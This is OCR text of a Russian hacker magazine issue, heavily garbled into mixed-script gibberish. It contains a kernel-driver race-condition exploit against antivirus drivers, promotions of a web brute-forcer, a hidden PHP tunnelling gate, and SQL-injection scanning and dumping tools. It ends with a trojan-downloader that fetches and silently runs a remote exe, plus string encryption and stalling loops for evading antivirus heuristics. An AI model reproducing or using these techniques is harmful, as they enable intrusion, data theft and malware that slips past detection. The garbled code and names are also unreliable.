сЬапде 0х8061А2 86-->Р8В380Е6 [ІІпкпоші 
тосіиіе Іііепате] 

пккгпіра . ехе-->№гСгеакеТЬгеасі, Туре : 

Асісігезз скапде 0х805С7208-->Р8ВЗ 80ВС 
[ІІпкпоші тосіиіе Іііепате] 

пккгпіра . ехе-->ЫкВе1екеКеу , Туре: Асісігезз 
скапде 0х806ІА716-->Р8В380ЕВ [ІІпкпоші 
тосіиіе Іііепате] 

пккгпіра . ехе-->№гВе1екеѴа1иеКеу , Туре : 
Асісігезз скапде 0х8061А8Еб-->Р8ВЗ 80Р5 
[ІІпкпошп тосіиіе Тііепате] 

пккгпіра . ехе-->ЫкВоасІВгіѵег , Туре: Асісігезз 
скапде 0х80579588-->Р8В38113 [ІІпкпоші 
тосіиіе Іііепате] 

пккгпіра. ехе-->ВкЬоасіКеу , Туре: Асісігезз 
сЬапде 0х8061С482-->Р8В380РА [ІІпкпоші 
тосіиіе Іііепате] 

пккгпіра . ехе-->Ы1і0репРгосезз , Туре: Асісігезз 
скапде 0х805С1296-->Р8В380С8 [ІІпкпоші 
тосіиіе Іііепате] 

пккгпіра . ехе-->ЫкОрепТЬ.геасі, Туре: Асісігезз 
скапде 0х805С1522-->Р8В380СВ [ІІпкпоші 
тосіиіе Іііепате] 

пккгпіра . ехе-->№іКер1асеКеу , Туре: Асісігезз 
скапде 0х8061С332-->Р8В38104 [ІІпкпоші 
тосіиіе Іііепате] 

пккгпіра . ехе-->ЫкКезкогеКеу , Туре: Асісігезз 
сЬапде 0х806ІВСЗЕ-->Р8В380РР [ІІпкпоші 
тосіиіе Іііепате] 

пккгпіра . ехе- ->№г8еЦ8узкетІп:Ё:огтаЦіоп , 

Туре: Асісігезз скапде 0х80605Е7 6-->Р8ВЗ 8118 
[ІІпкпоші тосіиіе Іііепате] 

пккгпіра . ехе-->№гЗекѴа1иеКеу , Туре: Асісігезз 
сііапде 0х8061880С-->Р8В380Р0 [ІІпкпоші 
тосіиіе Іііепате] 

пккгпіра . ехе-->ЫкТегтіпа1іеРгосезз , Туре : 
Асісігезз скапде 0х805С8С2А-->Р8В380В7 
[ІІпкпоші тосіиіе Іііепате] 

пккгпіра . ехе-->ЫШгікеѴігРиаІМетогу , Туре : 
Асісігезз скапде 0х805А981С-->Р8В380В2 
[ІІпкпошп тосіиіе Тііепате] 




НТТР://ѴѴѴШ 
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> Ііпкз 

• Анализ 
уязвимостей 
драйверов, Никита 
Тараканов — ги- 
зсгурЩ.огд/пе!- 

саі ЕІез/ЕіІе/гизсгур- 
1:о.2009.027.2Ір 

• Уязвимости в 
драйверах режима 
ядра для ѴѴіпбоѵѵз, 
Дмитрий Олексюк — 

гзсіп.ги/а гб сіе/а зпп/ 
бгіѵегбоіез.хті. 



• ібт.сот/сіеѵеіорег- 
ѵѵогкз/Ііпих/ІіЬга гу/1- 
сіеѵсігі-тідгаііоп/ 

• ѵѵазт.ги/зегіез. 
рбр?зісІ=9 



• зес[І5І5.огд/Ьид- 
1гад/2003/Рес/35 1 

• таіоизес.сот/ 

і пбо/а НісІез/кбоЬе- 
Э.О-еагіЬдиаке-Іюг- 
ѵѵіпсІоѵѵз-сІезкЩр- 
зесигку-зоІТѵѵаге.рЬр 
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Закодированная информация в параметре ІоСИ 



2 . Выбираем функцию, которая обрабатывает указатели или 
структуры, где есть указатели, например ІМіСгеаіеКеу (Р0В6ЕСТ 
АТТРІВІІТЕ5, РІІІ\ІІС00Е_5ТРІМѲ). 

3. Скачиваем пример реализации с зес[із1:5.огд/Ьид1:гад/2003/ 
Рес/351 . 

4 . Немного редактируем: 

2мСгеаЬеКеу = (_2ШгеаБеКеу *) СеСРгосАсМгезз ( 
СеБМосІиІеНапсІІе (Б м пкс111 . сЗ.11 " ) , " 2ШгеаБеКеу " ) ; 



ОВБЕСТ_АТТКІВБТЕ8 оа; 

™сЬаг_і члгсКеуБате [ ] = Ь" \\КЕСІ8ТКУ\\Бзег\\3-1-5-21-861 

5675 01-2 872 1872 9 -18 0167453 1-10 03 ХХЗоікхѵагеХХБеЦЗсаре" ; 
ШІСОБЕ_ЗТКШС КеуБаше = { 

зігеоі: члгсКеуБате - зігеоі: члгсКеуБате [ 0 ] , 
зігеоі: члгсКеуБате, 
члгсКеуБате 
} ; 

ѵйіііе ( !_кЪЫБ() ) 

{ 

НАБББЕ ЬКеу; 

оа . ОЬз есСЫате->Ви^^ег = (РѴ73ТК) рБг; 

БТ8ТАТБ8 ГС = 2ШгеаРеКеу ( &ЬКеу , КЕУ_КЕАБ, &оа, 
Тікіеіпсіех, ШББ, 

КЕО_ОРТІОК_ЫОЦ м ѴОЬАТІЬЕ , &БізрозіРіоп) ; 
іі ( ЫТ_ЗБССЕЗЗ (гс) ) 

СІозеНапсІІе (ЬКеу ) ; 

} 



БШКБ ЖЫАРІ Сгаск (БРѴОІБ Сопкехк) 

{ 

РОВБЕСТ_АТТКІВБТЕ8 оа = ( 

РОВБЕСТ_АТТКІВБТЕЗ) Сопкехк; 

БШКБ *ркг = (БШКБ*) &оа->ОЬзескЫате->Ви11ег; 

ЗекТЬгеаЬРгіогіЬу (СекСиггепкТЬгеаЬ ( ) , 
ТНКЕАБ_РКІОКІТУ_НІСНЕ8Т) ; 

ЗеБЕѵепБ (ЬЗкагБЕѵепк ) ; 

ѵгііііе ( Сгие ) 

{ 

*ріг = 0x90909090; //заменяем указатель на 
невалидный адрес в пространстве ядра 

Ю ( ШіРЕогЗіпдІеОЪб есБ (ЬЗРорЕѵепБ , 1) 

= = тіТ_ОВБЕСТ_0 ) Ьгеак; 

} 

геіигп 0; 

} 



5 . Запускаем и ждем. Поскольку переключение между пото- 
ками происходит очень быстро, а количество инструкций для 
реализации данной атаки небольшое (от 8 до 60), необходимо 
немного подождать. Потом ты увидишь ВЗОР. Очень часто такие 
уязвимости можно эксплуатировать как локальное повышение 
привилегий. 

кс1> 'апаіузе -ѵ 
ВидсЬеск Апаіузіз 

РАСЕ_ЕАББТ_Ш_№ЖРАСЕБ_АКЕА (50) 

Іпѵаіісі зузБеш шетогу маз геіегепсесі . ТЬіз саппок Ье 
ргоРесБес! Ьу Бгу-ехсерР, ІР шизР Ье ргоРесРеЬ Ьу а 
РгоЬе. Турісаііу РЬе асМгезз із зизР ріаіп ЬаЬ ог ІР 
із роіпРіпд аР РгееЬ шетогу. 

Подробности такого фейла смотри в листинге на нашем РѴР. 
Несмотря на то, что подавляющее большинство ошибок реа- 
лизации в драйверах реальных программ обусловлено именно 
неправильной валидацией указателей и некорректной провер- 
кой формата/размера входных данных, разработчику стоит обра- 
щать внимание не только на это. Вот еще некоторые нюансы, 
которые необходимо соблюдать при написании качественного 
кода: 

1. Если ты работаешь с памятью, указатель на которую был полу- 
чен извне, как с А8СІІ- или ІІпісобе-строкой, нужно обязатель- 
но проверять наличие нулевого байта в ее конце, так как при 
отсутствии такового функции зігіеп/ѵѵсзіеп и подобные вызовут 
Раде Ра и 11: при выходе за границы валидной страницы памяти. 

2 . Никогда не выполняй запись по кегпеі тобе-адресам, кото- 
рые были получены из пользовательского режима. Просто 
запомни это, как аксиому. Наличие подобных манипуляций, 
независимо от их характера, уже является серьезной уязвимо- 
стью, которая была допущена еще на стадии проектирования. 

3. Не забывай о дескрипторах, так как задачи, для решения 
которых драйверу необходимо получить дескриптор какого- 
либо объекта ядра, встречаются весьма часто. В этом случае 
корректность полученного дескриптора в драйвере поможет 
обеспечить выполнение его копирования с помощью функ- 
ции 2ѵѵ0и рІісаіеНапсІІе, однако более предпочтительным все 
же будет вариант с передачей драйверу из приложения не 
дескриптора объекта, а его имени с последующим открытием 
данного объекта уже на стороне драйвера. 

Вывод 

Как показывает практика, большинство антивирусов, НІРЗ’ов 
содержат уязвимости. А тестирование их драйверов в большин- 
стве компаний не проводится. Как итог, исправление уязвимо- 
стей в некоторых случаях занимает более года. Из вышесказан- 
ного можно сделать вывод, что драйверы антивирусов — лако- 
мый кусочек для хакера, цс 
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ТіМ МШИ размножается 
как кролик! Раньше был 
только юркал 





Но его девиз «Футбол как Страсть!» 

напал работать и вскоре 
у журнала появился сын — 
сайт ТоІаШШйи 




Еще через девять месяцев 
родилась двойня — 

группы в социальных 
сетях «ВКонтакте» 
иГасвІюок. 



И это только начало. 

Следите за размножением 
самого страстного 
футбольного бренда! мм 
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Программы 



Программа: ѴѴВР.боІсІ 
ОС: ѴѴіпаоѵѵз 2000/ХР/2003 
5егѵег/Ѵі$*а/2008 5егѵег/7 
Автор: [х26]ѴОІАЫО 




Брутфорсим веб-формы 

Первым в нашем сегодняшнем обзоре пред- 
станет веб-брутер ѴѴВР.боШ — переписанный 
с нуля и уже знакомый тебе по предыдущим 
выпускам Х-Тооіб «[ѴѴеЬ] ВгиІеРогсег» оттого 
же автора. 

Из нововведений особенно следует отметить 
улучшение стабильности и расширение функ- 
ционала проги на целый порядок: 

• Брут методом РОЗТ; 

• Брут методом СЕТ; 

• Брут Вазіс-авторизации (методом 
НЕАБ) ; 

• Поддержка НТТР8 (при бруте должны 
использоваться НТТРЗ -прокси) ; 

• Возможность установки дополнитель- 
ных переменных запроса (СЕТ/РОЗТ) ; 

• Возможность установки Соокіез; 

• Брут с использованием прокси 
(встроенный ротатор прокси с функцией 
авточека и настраиваемой автосменой) ; 

• три режима атаки (одного логина, 
нескольких логинов, по одному паро- 
лю) ; 

• Система пресетов : настройки для 
каждого сайта можно сохранять в от- 
дельный ХМБ-файл (пресет) и так же 
оперативно подгружать их; 

• Встроенный текстовый браузер с под- 
светкой тегов іприб и показом заго- 
ловков, полученных от сайта. 

Авоти основные отличия от старой версии: 

• Более лояльное отношение к сетевым 
ошибкам; 

• В разы увеличена скорость загрузки 
словаря; 

• Исправлен баг с ошибкой неверного 
определения кодировки страницы; 

• Более тщательная политика сохране- 
ния параметров; 

• Программа теперь сама сможет опре- 
делить верность настроек; 




Интерфейс проксика 



• Убрана многопоточность (без нее 
брутфорс стал работать без глюков) ; 

• Убрано большое количество недоче- 
тов . 

Как видишь, по своей сути ѴѴВР.ѲоШ — это 
самостоятельный и серьезный хак-продукт, 
имеющий мало общего со своей младшей 
версией. 

За последними версиями и хелпами заходи 
на официальную страницу проги, распола- 
гающуюся по адресу ѵѵопІесІ.ги/ргодгаппппБ/ 
ѵѵЬб-доІсІ 

Программа ѴРЗРгоху 
ОС: ѴУ/іпсіоѵѵз 2000/ХР/2003 
5егѵег/Ѵі$1а/2008 5егѵег/7 
Автор: [х26]ѴОІАЫР 

На очереди еще один мега-релиз от [х26] 

ѵоцмт 

На сей раз этотзамечательный кодер решил 
побаловать насутилитой для туннелиро- 
вания НТТР/НТТР5-трафика через РНР- 
гейт с удобным 6 III -интерфейсом. Если ты 
внимательно следишьза выпусками нашей 
рубрики, то наверняка помнишь несколько 
подобных описанных в ней разработок, не 
предоставлявших достаточного функционала 
и не имевших 0111. Настала пора исправить 
данное недоразумение. Итак, пройдемся по 
возможностям и особенностям проксика: 

• Поддержка НТТРЗ для РНР-гейтов; 

• Туннелирование НТТРЗ -трафика; 

• Возможность установки пароля на 
гейт ; 

• Возможность работы с гейтом через 
ЗОСК8 5 -прокси; 



• Защита от обнаружения по лог-фай- 
лам сервера; 

• Возможность установки соокіез , 
передаваемых при обращении к гей- 
ту (полезно при сокрытии кода 
гейта в файлах сайта , формат 
«шусоокіе=ѵа1ие; шусоокіе2=123 ; ») ; 

• Обработка каждого соединения в от- 
дельном потоке; 

• Возможность скачивания и закачива- 
ния неограниченно больших файлов; 

• Механизм препроцессинга запросов 
оптимизирует работу под НТТР 1.0; 

• Наличие шифрования со случайным 
ключом; 

• Все данные, включая пароль от 
гейта, передаются в зашифрован- 
ном виде ( включение /выключение 
шифрования не требует правки кода 
гейта) ; 

• Возможность работы сразу с не- 
сколькими гейтами; 

• Возможность выбора интерфейса для 
прослушивания ; 

• Подробная статистика по сетевым 
соединениям; 

• Разные уровни профилирования за- 
просов; 

• Ключи запуска: бгау (сворачивает 
окно в трей при запуске) , збагб (ав- 
томатически инициализирует прокси) , 
Ніббеп (скрывает иконку из трея) . 

Начать работу с программой 
достаточно просто: 

1. Заливаем на свой сайт файл даіе.рбр 
(пароль по умолчанию — «123»); 

2 В программе добавляем ІІРІ_ на 
залитый гейт и парол ь/соокіез (если это 
необходимо), выбираем его галочкой 
«Іізе»; 

3. Настраиваем порты и интерфейсдля про- 
слушивания (в большинстве случаев можно 
оставить поумолчанию); 

4. Нажимаем кнопку «Зіагі» и настра- 
иваем браузер на работу через прокси 
«ІосаІЬо5І:2222» (НТТР) и «ІосаІЬо5І:2223» 
(НТТРЗ); 

5 Наслаждаемся работой собственноручно 
настроенного проксика :). 

Также советую воспользоваться неболь- 
шим хинтом отавтора: для запуска вместе с 
системой добавь в «Автозапуск» ярлык «[сІіг]\ 
ѴРЗРгоху.ехе -Ігау-зіагі». 

Подробности и комментарии ищи втопике на 
Античате — Ьгит.апіісЬаТгиЛЬгеасІ227973. 
Ыті. 
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Продвинутый Реѵегзе ІР 

Программа: ОхРИРЗІС 
ОС: ѴѴіпсіоѵѵз 2000/ХР/2003 
5егѵег/Ѵі$1 , а/2008 $егѵег/7 
Автор: 0x00 

Авоти очередной хакерский комбайн, 
известный юзерам форума ѵѵеЬхакер.пеІ под 
названием 0хНІ6Р8ІС (Реѵегзе ІР+ І_іпк Рагзе + 
8061п|'ес1:іоп СЬеск). 

Прога состоит из трех утилит, соединенных 
воедино одним удобным интерфейсом: 

1. Утилита для работы с Реѵегзе ІР для указан- 
ного домена; 

. Парсингссылоквыбранного адреса по 
поисковым сервисам; 

3. Проверка собранныхссылокна наличие 
801-инъекций. 

Постараюсь объяснить взаимодействие дан- 
ныхутилитна следующем примере: 

1. ты пытаешься проникнуть на какой-либо 
сайт, но у тебя ничего не выходит; 

2. ты берешьОхНІІ_Р8ІС и пользуешься ути- 
литой с Реѵегзе ІР (получаешь адреса других 
сайтов, расположенных на том же ІР); 

3. прога собирает ссылки из поисковиков на 
каком-либо из найденныхдоменов; 

4. собранные ссылки проверяются на наличие 
801-инъекций; 

5 найденные инъекции успешно эксплуати- 
руются тобой :). 

Каквидишь, с помощью представленной 
тулзы обычная процедура работы с реверс ІР 
ускоряется в разы. 

А вот и основные возможности и особенности 
нашего комбайна: 

• Веѵегзе ІР, собирающий информацию сра- 
зу с нескольких сервисов одновременно; 

• Парсинг ссылок для определенного 
домена с различных поисковых движков; 

• Многопоточность; 

• Использование НТТР-прокси; 

• Автоматическая проверка наличия 
новой версии; 

• Возможность отсеивания дубликатов 
ссылок по заданному паттерну; 

• Возможность фильтрации ссылок по 
заданному паттерну; 

• Возможность удаления отмеченных 
ссылок; 

• Сохранение собранных ссылок после 
закрытия программы в текстовый файл 
Ііпкз . ВхВ ; 

• Возможность сохранения отпарсен- 
ных доменов в текстовый файл (для 
восстановления работы проги в нужный 
момент) ; 

• Очистка окон ввода и вывода; 

• Сохранение настроек и результатов 
чека ; 







Дампим базы по-умному 



• Возможность добавлять свои слова 
для поиска ЗОЬ -инъекций в текстовый 
файл сйеск . кхб ; 

• Прогресс-бар; 

• Продвинутая система логирования; 

• Всплывающие подсказки. 

Использовать прогу достаточно просто. Вот 
примеры некоторых действий с основными 
кнопками: 

«РЕВЕРС» — начало проверки заданного 
сайта на наличие сайтов-соседей с использо- 
ванием выбранного сервиса; 

«Собрать ССЫЛКИ» - начало сбора 
ссылокдля выбранного слева сайта с исполь- 
зованием выбранного сервиса (количество 
получаемых ссылок регулируется в окошке над 

КНОПКОЙ); 

«УбраТІ — отсеивание дубликатов по 
введенному нами паттерну; 

«Проверить на 5СИ Іп|есНоп: - 

проверка ссылок, которые находятся в текущем 
списке, на 806-инъекции (вывод произойдетв 
новом окне); 

«СТОП» — остановка рабочих процессов 
программы; 

«ОЧИСТИТЬ — очистка одного из трех 
главныхокон программы. 

Налюбыетвои вопросы автор с радостью 
ответит здесь — ЬіфУ/ісд-етаіІ-ѵкопіакіе.ги/ 
1югит/5ЬоѵѵіЬгеаб.рЬр?р=59345. 

Программа: г$аІІпОитрег[$яІ] 

ОС: ѴѴіпсіоѵѵз 2000/ХР/2003 
5егѵег/Ѵі$1а/2008 5егѵег/7 
Автор г$аРеІіаЫе5 

Наверняка ты не раз находил и раскручивал 
806-инъекции на сайтахстысячами пользо- 
вателей. Каждый раз, когда было необходимо 
сдампить всю базу с этими самыми пользова- 
телями, тебе приходилось либо использовать 
не предназначенные для этих целей наворо- 
ченные 806-комбайны, либо писать свои ути- 
литы. Спешутебя обрадовать — теперь втвоем 
распоряжении есть быстрый многопоточный 
универсальный 806-дампер с поддержкой 
прокси! Функционал проги просто поражает 
воображение: 

• Многопоточность (от 1 до 100 пото- 
ков) ; 

• Поддержка НТТР-прокси; 

• Система передышек (защита от анти- 
ББоЗ скриптов) ; 

• Возможность дампа практически любых 
данных (от версии МуЗСЩ до выборочных 
ячеек БД) ; 



ЗтаІІ Рагзег X 
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Маленький парсер 

• Возможность указания своих заголов- 
ков с ЮзегАдепб и Кеіегег; 

• Реализована система «Пауз а /Продол- 
жить бшпр» (ты можешь приостановить 
процесс и выключить комп, а затем про- 
должить процесс дампа) ; 

• Реализована система повторной 
проверки тех запросов к серверу, при 
выполнении которых произошла ошибка; 

• Отображение количества потоков , 
работающих в данный момент; 

• Отображение общего числа ЗОЬ 
Іішіб 1 ов; 

• Отображение последнего лимита, ко- 
торому был послан запрос; 

• Отображение количества ответов , 
записанных в файл; 

• Автоматическая система проверки 
новых версий программы; 

• Сворачивание программы в трей; 

• Сохранение настроек в конфиг-файл и 
их автозагрука при запуске; 

• Информативные всплывающие подсказ- 
ки при наведении на элементы интер- 
фейса; 

• Работа на .Ыеб Ргатетлгогк 2 . 0 + . 

Для начала работы с утилитой тебе необходимо 
всего лишь составить соответствующий запрос 
для нужной ссылки с806-инъекцией. Запрос 
должен начинаться на «Ьир://» и заканчи- 
ваться конструкцией «Іітіі», активное поле 
вывода в запросе следует заменить макросом 
«<{рагат}>», а в поле«Данные для дампа...» 
необходимо перечислить имена тех колонок, 
которые нужно сдампить. Автор с нетерпением 
ждеттвоих вопросов втопике ЬирУ/ісд-етаіІ- 
ѵкопіа кіе. ги/боги т/зЬоѵѵіЬ геа сі . рЬ р?1=83 1 0 . 

Программа: 5таІІ Рагзег 
ОС: ѴѴіпаоѵѵз 2000/ХР/2003 
5егѵег/Ѵі$1а/2008 5егѵег/7 

Автор: 0|Р1у 

Напоследокхочу представить тебе маленькую, 
но крайне полезную для асечников и мейлеров 
программку «8та[[ Рагзег» от модератора 
Асечки, 0)Р1у. 

Данная прога парситсписки вида «иіп;разз», 
«ІодіпЙтаіІ.ги» ит.д. (то естьлюбые данные, 
разделенныеточкой с запятой или любым 
другим разделителем). 

Для разделения да иных тебе всего лишь 
нужно сохранить свой список в файл іппрогб 
1x6 который должен находиться в одной пап- 
ке с парсером, и нажать на кнопку «8ба гі». 
После этих нехитрых действий рядом с 
файлом ітрогбіхі: появится отпарсенный 
файл ехрогбіхб^с 
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КІ52011, N0032, Аѵіга, МсАІее: мы сделали их всех! 

о Современные антивирусы пролезли глубоко в ОС, раскинули свои 
щупальца по всей системе и пытаются контролировать любую 
активность. И все для того, чтобы злые вирусы ничем не омрачили 
беззаботную жизнь простого пользователя. Одним из этих щупальцев 
является эвристика. Сегодня мы узнаем, насколько сильны топовые 
антивири в вопросах анализа кода. 

ДЛЯ ИСПЫТАНИЙ МЫ ПОДОБРАЛИ ЧЕТЫРЕ АНТИВИРУСА, КОТОРЫЕ 
ХОРОШО ИЗВЕСТНЫ НА ПРОСТОРАХ НАШЕЙ НЕОБЪЯТНОЙ РОДИНЫ. 

Первым будет Казрегзку Іпіегпеі Зесигііу 201 1, который хвастается 
возможностью детектирования неизвестных зловередов. Е5ЕТ N0032 
— следующий представитель антивирусной индустрии, участвующий 
втестировании. Разработчики заявляюто передовой технологии 
ТЬгеаіЗепзе, которая позволяет обнаружить множество угроз, так как 
использует сочетание эвристических методов и методов сигнатурного 
поиска. Третий подопытный — Аѵіга АпбѴіг. Это защитное ПО пользует- 
ся большой популярностью среди нашихсоотечественников благода- 
ря наличию полноценной бесплатной версии. И, наконец, последним 
в списке идетМсАІюе — американская разработка, которая активно 
пропихивается на российский рынок некоторыми производителями 
ноутбуков. Впрочем, втестмы ее включили далеко не по этой причине. 

Хочешьзнать, по какойЗУзнаешь из этой статьи. 

Принцип 
тестирования 

Для тестирования мы разработали программу, симулирующую поведе- 
ние простого троянца-даунлоадера. Код этой программы очень прост: 



Вот эти несколько строк и составляют основу нашей приманки 

ШС гез; 

ТСНАК. 32ІІГ 1 [ ] = _Т ( "ЦЦЦр: //ѵігЬозС . сош/Ьіп/ІаипсЦ. ехе" ) ; 
ТСНАК 3 2 ТешрЫаше[] = _Т ( "С : \\1аипсЪ.. ехе" ) ; 

// загрузка и запуск файла 
гез = ШЬБоѵтІоасІТоРіІе (ШІЬЬ , згіігі , 
з гТешрЫаше , ШШ , ШЬЬ } ; 
іі (гез == 8_ОК) { 

ЗНеІІЕхесиНе (ШШ ,_Т ( " ореп" ) , згТетрЫате, ЫІІШ, 

ЫЦЬЬ, ЗТлМЧІБЕ) ; 

} 

Псевдо-троянец просто скачивает некоторый ехе-файл с зараженно- 
го сервера и сразу же пытается запустить его в скрытом режиме так, 
чтобы пользователь не увидел никаких признаков работы загружен- 
ного бинаря. 

Эти нехитрые манипуляции вызываютсильные подозрения у 
достаточно большого количества современных антивирусов. Наши 
подопытные — не исключение. Все выбранные нами антивири 
ругаются на мнимый боѵѵпіоасіег. Касперский, например, называет 



►076 



ХАКЕР 11 /142/ 10 




*іяВД.*,м-№Іг% . -Т. 

* ѵ Я И ^ ІІ Ьг»-ірш»т» чт^!дд (ш?Ы-шг4ф*. т*і6-ж*^іѵятаѵМмммщ т**Ш ■ ^ ідп^н^мруі-ащ» □ - -| 



Ціі. Ш 



В В - Р- ■ 



ІаиТіі 


І.1.4.ІЙ 






шит-т 


ІІ.М 




- 


І1ІЕГ11ПК.І1А 


и*. С 




* 


НЫІ 


4В.ЦИ.І 




* 


АМІЕЗ 


1.К.ЙІ.0 


гѵіс.-оі.Фі 


- 


м* 








ІІсйгЕпйлг 


І.л 




* 


Ш-ЬНШІІ 


11.» 


ни.ИіП 


- 


(ішѵ 


4.И.І.4-ѴІС 




■ 


ашлш 


ни 




- 


МЙ 


і.й.1. <пиа 


ям«.«гі.га 


- 


ммп 


І.Ѵ.ІѣЛ 


НИ.Ѵ.Н 


- 


(Ыі 


І.МТ.* 




* 


іТнгЪ'Ѵік 


Н.І.Ш1 


Ы14.Н.Н 


- 






ети.-р?,и. 


- 


Г-№ч*1 


Т,*,І шьл 




■* 


Гнісчис 


4М«и 




* 


Ячи 


11 


»!*.«.« 


- 


ПІМ 




2*1*.**.*) 


- 


Лішчрла 


ІккН 


іэал.ы.ні 


Ч* 


ІШіиТІіп 


ма.ніі 


ЗВД.ѴГ.К 


* 


три шу 


311 


ни.**,** 




Ын 


І.4М.4.1ІМ 








ш й.и 




- 


ПктЕі 


І,11Н 


п»,п.п 


- 


ѵтш 


Ні! 




'идиті ІЦгИІИи! 


Віш 


і.и.и 







Проверяем вирустоталом тестовый вирус без каких-либо трюков для обхода эвристики. 
И это все, что они могут?! 



Ъ+иІ1№1Н ■ 



его Неиг.ОоѵѵпІоасІег, а N0032 более размыто — ргоЬаЫу ипкпоѵѵп 
ЫеѵѵНеиг_РЕ. 

Теперь перед нами стоит задача изменить код зловреда таким 
образом, чтобы сохранилась основная функциональность (то есть 
загрузка и запусксторонней программы судаленного сервера), 
но антивирусы перестали на него ругаться. Делать мы это будем 
совершенно разными способами. Каждый новый антиэвристичес- 
кий прием будет оформлен в виде отдельного теста. По результатам 
испытания антивирь будет получать плюс или минус. В конце мы 
подсчитаем общее количество положительных результатов и подве- 
дем итог. 

Тест №1 

Первое испытание мы решили сделать совсем простым. Функции 
ПРЮоѵѵпІоасІТоРіІе передается строка с адресом файла на уда- 
ленном сервере, который будетзагружен на компьютер, а одним из 
параметров ЗбеНЕхесііІе является полный путь кфайлу, который 
надо запустить. Попытка обмана эвристики будет заключаться в том, 
что мы предварительно зашифруем эти строки, а расшифровка будет 
выполняться непосредственно перед вызовом ФІ Р Юоѵѵп Іоа сі Рі Іе . В 
коде это будет выглядеть примерно так: 

Шифруем строковые переменные 

ЬСЖС гез; 

// зашифрованные строки 

ТСНАК. з 2ІІг 1 [ ] = _Т ( "т^^и?**з1ыш^ѵ^+^^]т*д1к*і(і1к^т+ ' } ' " ) ; 

ТСНАК згТешрЫаше [ ] = _Т ( " Р?Уісі1к^т+ ' } ' " ) ; 

// явно задаем ключ для расшифровки 

іпЬ кеу = 5; 

сіесгурк ( згіігі , кеу ) ; 

сіесгурк ( згТешрЫате , кеу ) ; 

// загрузка и запуск файла 

гез = ЦКЬБоыпІоасІТоРіІе (ЖПЗЬ , згіігі , эгТетрИате , 



і і (гез == 3_ОК) 

{ 

ЗНеІІЕхесике (ШЬЬ ,_Т ( " ореп" ) , ззТетрЫаше, 

ШЬЬ, ШЬЬ, ЗМ_НІВЕ) ; 

} 

Как видно, переменные 52ІМ и згТетрЫате изначально выглядят 
абсолютно нечитабельно. «Нормальными» они стануттолько после 
выполнения процедуры расшифровки. Стоит отметить, что ключ, 
который мы передаем функции бесгурі для приведения строк к пра- 
вильному виду, известен заранее и вшитв программу. Таким образом, 
хорошему эвристику не должно составить труда понять, что же скрыто 
за, казалосьбы, случайным набором символов. 

Теперь посмотрим, как справятся с этим наши антивирусы. Каспер- 
ский, будучи у нас в списке первым, без труда определил вероятного 
зловреда, обозвав его Неиг.ОоѵѵпІоабег. І\І0032тоже отработал на 
совесть и сказал, что файлик кажется ему подозрительным, выдав 
в алерте строку ргоЬаЫу ипкпоѵѵп ЫеѵѵНеиг_РЕ. Также хорошо 
сработали и Аѵіга с МсАГее, определив наш псевдовирус какТР/ 
ОоѵѵпІоасІег.Оеп и 5изрес1;-0!2В731345А40А соответственно. Как мы 
и рассчитывали, простейший трюке обманом эвристики не сработал. 
Все испытуемыесправилисьсзаданием. Но посмотрим, что будет 
дальше. 

Тест №2 

Все эвристические движки имеют некоторые ограничения. В час- 
тности, это ограничения на глубину и время анализа кода. Проще 
говоря, если зловред перед выполнением основной своей миссии 
будет производить какие-либо ресурсоемкие действия (например, 
сортировать пузырьком массив в пару сотен тысяч элементов), то 
эвристик попросту не дойдет до вредоносной части кода и оставит 
вирус в покое. 

Вооружившись этими знаниями, мы решили пойти напролом, ис- 
пользуя грубую силу. Перед выполнением основного кода мы помес- 
тили цикл на 2000001 итерацию (ну, а чего мелочиться?). Операции, 
которые выполняются втеле цикла, вовсе не бессмысленны, иначе 
умный антивирус может догадаться, что его пытаются обмануть. 



ХАКЕР 1 1 /142/ 10 



► 077 







ЛЛАШАРЕ 



->ы.г.у^ г Ьр, _ | О ! *п*Тии > Р-н 'Ѵ4>Ѵ . 








егФ ? — "Тів’ІЕЯ 












_ ,ЯШ 


ІМгіЕ 


4.1.11*1.0 


ДфІВ.Н.М 


- 


Гт 


Хгшш\Л 


і.г.іЫъй 


там.йл 


- 






р.р.в.іи 


ЛЕІЖЯ 


Ртоі - Рм чм 




ш 

і 

I 


Т. Е 


«ій.ет.ы 


* 




ат->іяіи 


Іі-ва 


Шй.Н.Я 


- 






в.Ы.З.Ф-щ 


ЛЕВ.н.и 


- 




йн» 


КИ 


тіа.о9,оз 


- 




Иф 


М.ІнйОД 


ИНнНИЙ 


т 




ЫНА 


і.*. В. тт 


ш.п.ы 


- 




ІМІ 


ЪО.хЛІ 


ЮЕй,*Р.йі 


- 






Н.І.Ш) 


мійьМ.ш- 


- 




ѴЧѴкжЬ. 




заіа.аш.т 


- 




Г-М»і 


Р.ІДН^.В 


ННгРР.Н 


- 




АКІЖ 




ЛОІО-ИР-ЙІ 


- 




ІЙГ-ЦТИ 


Л 




* 




Вт 


П.1.М1.В 


ІОЕВрП.Щ 


- 




Ииріи 


и.тКя 


ІІЕВ.Н.» 


- 




ГіЛПѴкШ 


«.4-1 ,МН 


ми.йі.м 


- 






т.в.&.ш 


Шйм.йй 


■ 




кип 




СТЕВ-ІР.И 








1Ш - II 


■ПЕО.ІІ.М 


- 




ипыіЕі 


ШВІ 


ліа.н-.ш 


- 




■Мах 


нл 


яна.ю. аз 


- 




Ачыя 




ЛЦВ-І»,П1 


* 




гіММ 


№&***&.* і 




* 




ГШт 


1Р.Г.Г.Т 


ПЕР.9І.Ы 


- 




ГП№ЕІ 


1.І.М 


ПЕ0.М.М 


- 


У 


ВДР» ■ 








ф*ч«инч - 



А теперь прогоним через вирустотая тестовый вирь с маскировкой по рецепту из третьего испытания 



Каждое повторение расшифровывает наши криптованные строки. 
Атаккакмы используем алгоритм симметричного шифрования, то 
для получения правильного результата надо лишь позаботиться о 
том, чтобы количество повторений в цикле было нечетным. В этом 
случае по завершении всех итераций мы увидим расшифрованные 
значения строк. Для наглядности — код: 

Используем «большой» цикл расшифровки строк 

// зашифрованные строки 



О Александр Лозовский, 
редактор рубрики «ААаІѵѵаге» 

Если ты уже прочитал статью, то наверняка понял, как именно 
мыотбиралиантиви русы дл я се год н я ш н е го те ста . Н а сл уч а й , 
если чтение статей ты начинаешь с врезок и картинок, раскрою 
тайну сразу: да, мы использовали гадание на вирустотале. Дело 
втом, что антивирусы в целом настолько плохо справлялись с 
нашими тестами, что у нас просто не осталось другого выхода, 
кроме какзалить наши сэмплы на вирустотал и найти антивиру- 
сы, которые хоть как-нибудь способны сними справиться. Чтобы 
насладиться общей картиной, ознакомься с парой скринов 
вирустотала, которые ждут тебя в этой статье. Кстати, МсА^ее, 
несмотря на его малую распространенность в наших пенатах, мы 
взяли втест по этой же причине — какударника эвристического 
